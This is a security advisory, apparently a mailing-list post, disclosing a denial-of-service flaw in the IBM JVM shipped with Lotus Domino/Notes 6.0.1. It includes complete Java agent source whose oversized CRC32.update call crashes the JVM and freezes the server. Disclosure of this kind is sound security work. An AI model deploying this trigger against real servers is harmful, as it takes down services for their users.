Hi,
the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory
is not freed and causes the server machine (observed on MS XP) to
freeze and deny further service.
IMPLICATIONS
-
If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
-
if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.
ANALYSIS:
The call to the “update” method of the CRC32 raises an integer overflow
in the java java.util.zip.* core libraries which triggers a jni routine
that cannot handle the extreme high input value.
HISTORY:
This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.
The background of this bugs is described at www.illegalaccess.org
Sincerely
Marc Schoenefeld
=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;
public class JavaAgent extends AgentBase {
public void NotesMain() {
try {
Session session = getSession();
AgentContext agentContext =
session.getAgentContext();
CRC32 crc32 = new CRC32();
crc32.update(new byte[0], 4, 0x7ffffffc);
// (Your code goes here)
} catch(Exception e) {
e.printStackTrace();
}
}
}
=========================Agent Source Code===========================
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. – Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer